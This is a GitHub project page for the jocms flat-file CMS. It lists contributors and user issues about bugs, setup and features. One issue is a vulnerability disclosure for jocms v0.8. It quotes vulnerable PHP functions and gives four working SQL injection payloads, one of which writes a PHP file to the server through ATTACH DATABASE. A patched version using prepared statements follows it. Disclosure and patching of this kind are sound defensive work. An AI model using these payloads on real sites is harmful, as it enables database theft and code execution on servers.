mxgbr / jocms


jocms - A Simple CMS for Easy Editing

Home Page: https://jocms.net

License: GNU Lesser General Public License v2.1

PHP 43.21% CSS 9.24% JavaScript 45.53% Less 2.02%
cms flat-file inline-editing simple wysiwyg-html-editor

jocms's People

Contributors

mxgbr, sawy7


jocms's Issues

data-jo="true" elements not editable while inside a data-jo-content="repeated" container!

Title says it all. While a data-jo="true" element is inside a data-jo-content="repeated" container, there is no option of editing it! One use case where this really hinders the usability is, for example, restaurant menus. If this error wasn't the case, the end user could freely edit their own menu, adding or removing lines and replacing them with new products; in its current state, this is not possible!

Website pages in the file overview are displayed double

The websites in the file overview are displayed twice, but each actually exists only once on the server.


Other than that, I like your CMS very much; I even sent you some $$$ via PayPal. It would be nice if you fixed the security issues first (mentioned by another GitHub member in one of the issues), and then you'll get it stable.

I am very curious about the future - really great CMS.

Please keep it up and don't let stupid comments and parasites stop you from further developing this CMS.

Best regards from Stuttgart,

Andi :)

Upload Files?

Hello :)

Is there a reason to upload files like .pdf? That will be amazing!

And I want to say that I love your tool!
It is super easy and productive, and it's the best reason to get editable content onto a statically developed website.

Thank you 🥇

Website down

Hi,
I would take a first look at this static CMS, but the website is down.

Cheers

jocms v0.8 has some SQL Injection vulnerability

1.SQL Injection vulnerability

In jocms/apps/mask/inc/mask.php line 18~23:

    $decoded = jo_json_check();
    if($decoded == false){
      throw new Exception($JO_LANG['ERR_INP_JSON']);
    }

    $mask = jo_get_masks($decoded["id"])[0];

The function jo_json_check() returns the JSON data submitted by users:

function jo_json_check(){
  if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
      return false;
  }

  $contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
  if(strpos(strtolower($contentType), 'application/json') != 0){
      return false;
  }

  $content = trim(file_get_contents("php://input"));

  $decoded = json_decode($content, true);

  if(!is_array($decoded)){
      return false;
  }
  return $decoded;
}

Then jo_get_masks() will execute the SQL statement.

function jo_get_masks($id){
    $condition = "";
    $masks = [];
    if($id != "all"){
        $condition = " WHERE id='".$id."' ";
    }else{
        $condition = " WHERE type='mask' ";
    }
    $code;
    $handle = jocms_db_link();
    $result = $handle->query("SELECT * FROM masks ".$condition." ORDER BY name");
    while($output = $result->fetchArray()){
        $masks[] = $output;
    }
    return $masks;
}

There is no filtering for the input parameter, so we can use single quotation marks to close the string and inject. Payload:

{"id":"1'union select 1,'hacked',3,sqlite_version(),5--"}


2.SQL Injection vulnerability

In jocms/apps/mask/inc/getmask.php line 16~21

    $decoded = jo_json_check();
    if($decoded == false){
      throw new Exception($JO_LANG['ERR_INP_JSON']);
    }

    $masks = jo_get_masks($decoded["content"]);

It's similar to the one above. Just change the id to content. Payload:

{"content":"1'union select 1,'hacked',3,sqlite_version(),5--"}


3.SQL Injection vulnerability

In jocms/apps/mask/mask.php line 19~30

if(isset($_POST["saved"])){
    if(isset($_POST["id"]) AND isset($_POST["name"]) AND isset($_POST["code"])){
        $code = $_POST["code"];
        $code = str_replace(array("\r\n", chr(10).chr(13), "\r", "\n", PHP_EOL, chr(10), chr(13)),'--jo:r--', $code);
        $domobject = str_get_html ($code);
        $attr = "data-jo-content";
        $mask = $domobject->find("*", 0);
        $mask->$attr = "noneditable";
        $code = str_replace("--jo:r--", PHP_EOL,  $domobject->save());
        jo_set_mask($_POST["id"], $_POST["name"], "mask", $code);
    }
}

User-controlled parameters are passed into the function jo_set_mask().

In jocms/core/inc/db.php line 253:

function jo_set_mask($id, $name, $type, $code){
    $handle = jocms_db_link();
    if($id != 0){
        $return = $handle->exec("UPDATE masks SET name='".$name."', code='".$code."' WHERE id='".$id."'");
        $return = $id;
    }else{
        $return = $handle->exec("INSERT INTO masks(name,type,code) VALUES ('".$handle->escapeString($name)."','".$handle->escapeString($type)."','".$handle->escapeString($code)."')");
        $return = $handle->lastInsertRowid();
    }
    return $return;
}

There is no filtering for the parameters, so we can execute any SQL statement.

We can write PHP code with this:

saved=a&id=1';ATTACH DATABASE 'shell.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo()?>');&name=xxxxxxx&code=xxxxxxxx


4.SQL Injection vulnerability

In jocms/apps/mask/mask.php line 31~33:

if(isset($_GET["deleted"]) AND isset($_GET["id"])){
    jo_delete_mask($_GET["id"]);
}

Follow the function jo_delete_mask():

function jo_delete_mask($id){
    $handle = jocms_db_link();
    $result = $handle->query("DELETE FROM masks WHERE id='".$id."'");
    return $result;
}

There is no filtering for the parameter id, so we can inject; use time-based injection:

?deleted=x&id=0'or+case+when(1=2)+then(randomblob(1000000000))else(0)end+or+'


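For comparison with the report above, here is an added example (not jocms's own code) of the same three helpers rewritten with SQLite3 prepared statements, so the id, name and code values are bound as parameters rather than concatenated into the query. It assumes jocms_db_link() returns a \SQLite3 handle, as the quoted code implies, and the _safe suffixes and the call-site snippet are this example's own naming.

```php
<?php
// Added example: parameterised versions of jo_get_masks, jo_set_mask and
// jo_delete_mask. Assumes jocms_db_link() returns a \SQLite3 handle (the quoted
// code calls ->query(), ->exec(), ->escapeString() and ->lastInsertRowid() on it).

function jo_get_masks_safe(string $id): array {
    $handle = jocms_db_link();
    if ($id !== 'all') {
        // Bound value: a quote inside $id cannot terminate the SQL literal.
        $stmt = $handle->prepare("SELECT * FROM masks WHERE id = :id ORDER BY name");
        $stmt->bindValue(':id', $id, SQLITE3_TEXT);
    } else {
        $stmt = $handle->prepare("SELECT * FROM masks WHERE type = 'mask' ORDER BY name");
    }
    $masks = [];
    $result = $stmt->execute();
    while ($row = $result->fetchArray(SQLITE3_ASSOC)) {
        $masks[] = $row;
    }
    return $masks;
}

function jo_set_mask_safe(int $id, string $name, string $type, string $code): int {
    $handle = jocms_db_link();
    if ($id !== 0) {
        $stmt = $handle->prepare("UPDATE masks SET name = :name, code = :code WHERE id = :id");
        $stmt->bindValue(':id', $id, SQLITE3_INTEGER);
    } else {
        $stmt = $handle->prepare("INSERT INTO masks(name, type, code) VALUES (:name, :type, :code)");
        $stmt->bindValue(':type', $type, SQLITE3_TEXT);
    }
    $stmt->bindValue(':name', $name, SQLITE3_TEXT);
    $stmt->bindValue(':code', $code, SQLITE3_TEXT);
    $stmt->execute();
    return $id !== 0 ? $id : $handle->lastInsertRowid();
}

function jo_delete_mask_safe(int $id): bool {
    $handle = jocms_db_link();
    $stmt = $handle->prepare("DELETE FROM masks WHERE id = :id");
    $stmt->bindValue(':id', $id, SQLITE3_INTEGER);
    return $stmt->execute() !== false;
}

// Assumed call site: only a purely numeric id reaches the query, and it is cast
// to int, so strings such as "0'or ..." are rejected before any SQL runs.
if (isset($_GET["deleted"], $_GET["id"]) && ctype_digit($_GET["id"])) {
    jo_delete_mask_safe((int)$_GET["id"]);
}
```

The same int cast and ctype_digit check apply to $decoded["id"] and $_POST["id"] at the other call sites in the report.
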
Error when trying to setup jocms

An error occurred:

Cannot access the database. Please check the permissions. (ERR_404_DB) Unable to open database: unable to open database file

I've tried to enable permissions but I don't know what is wrong.
Any help is appreciated.

FIXED: sudo chmod o+w /var/www/html/jocms/core/database/
that did the trick

Error message if file extensions have been removed

I have removed the ".php" file extensions via the .htaccess file. This is causing an error and the CMS will not work.
If I add the ".php" manually, the CMS works fine.

Is there a way to fix this?

Thank you

Question about Coast CMS


Good afternoon! Thank you for your wonderful developments! Unfortunately, on the site http://www.coast-cms.de/ I didn't find any feedback form, so I'm writing here! I really like coast-cms! Thank you very much for your work! I made a translation into Russian. Where do I send the translation file for the community? I wanted to ask you whether the coast-cms project is no longer being developed and has been replaced by the jocms project, or whether both are being developed in parallel? For the coast-cms project, I wanted to ask whether it is possible, for security, to change the address of the admin panel from cms.php to anything else? Can this override be set in the settings file? And one more question: if in the htaccess file you do not show the html extension in the address bar, then editing is not possible; what can be done in this case? How do I disable the html file validation feature? Thank you in advance for your answer!

Currently only working in root directory?

First of all, thanks for this great product; as a long-time user of Coast CMS, jocms seems like a possible successor.
During my tests of the system it seemed to only work if installed in the root directory (www.test.com/jocms/); it would be nice to have the option to use it also within subdirectories, also for local development (www.test.com/test1/jocms/ or localhost/test1/jocms).
I've also sent a short mail to your address concerning professional usage; I just wanted to make sure you've got it.

2 hours disabled to login

Is there a way to delete the 2-hour login lockout as an administrator? For some reason, after trying the password too fast it locked me out. I am trying this script with PHP 8.xx and so far it seems to work.

Default Blocks Format

Hi there,

Is there any way to set the default "Blocks" setting to Div instead of Paragraph (under menu Formats > Blocks?).

Thanks,
Ryan

Documentation

Is it possible to get or host a copy of the documentation? Unfortunately the website is down, and without any documentation it is hard to get it running.

Incorrect Email or Password

Can only log in under administrator account even though I have set up a user account and confirmed credentials are correct.
